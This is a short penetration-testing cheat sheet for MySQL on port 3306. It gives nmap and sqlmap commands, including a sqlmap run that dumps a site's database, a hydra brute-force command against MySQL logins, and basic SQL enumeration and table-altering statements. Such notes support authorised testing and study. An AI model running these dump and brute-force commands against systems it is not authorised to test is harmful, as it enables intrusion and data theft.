GeorgeBanu

MySQL-3306

  • scan

# initial scan
nmap -T4 -vv -sC --script='mysql-*' "$IP" -p 3306 -oN recon/nmap_sql_port
# website scan
sqlmap -u "$IP/store.php?id=1" --dbms=MySQL --forms --risk 3 --level 5 --threads 10 --random-agent --batch --dump
  • login

mysql -u'username' -p'password' -h $IP -D opencats
# opencats --> database name

# brute force using hydra
hydra -l $username -P /path/to/wordlist $IP mysql
  • Basic commands to enumerate database content

SHOW COLUMNS FROM table_name;	#Show column names

SELECT * FROM table_name;	#Show all columns in a table

SELECT column1, column2 FROM table_name;	#Show specific columns in a table

DROP TABLE logins;	#Delete a table

ALTER TABLE logins ADD newColumn INT;	#Add new column

ALTER TABLE logins RENAME COLUMN newColumn TO oldColumn; #Rename column

ALTER TABLE logins MODIFY oldColumn DATE;	#Change column datatype

ALTER TABLE logins DROP oldColumn;	#Delete column

SELECT * FROM logins ORDER BY column_1;	#Sort by column

SELECT * FROM logins ORDER BY column_1 DESC;	#Sort by column in descending order

SELECT * FROM logins ORDER BY column_1 DESC, id ASC;	#Sort by two columns

SELECT * FROM logins LIMIT 2;	#Only show first two results

SELECT * FROM logins LIMIT 1, 2;	#Show two results, skipping the first row (offset 1, count 2)

SELECT * FROM table_name WHERE <condition>;	#List results that meet a condition

SELECT * FROM logins WHERE username LIKE 'admin%';	#List results where username starts with 'admin'

Last updated 1 year ago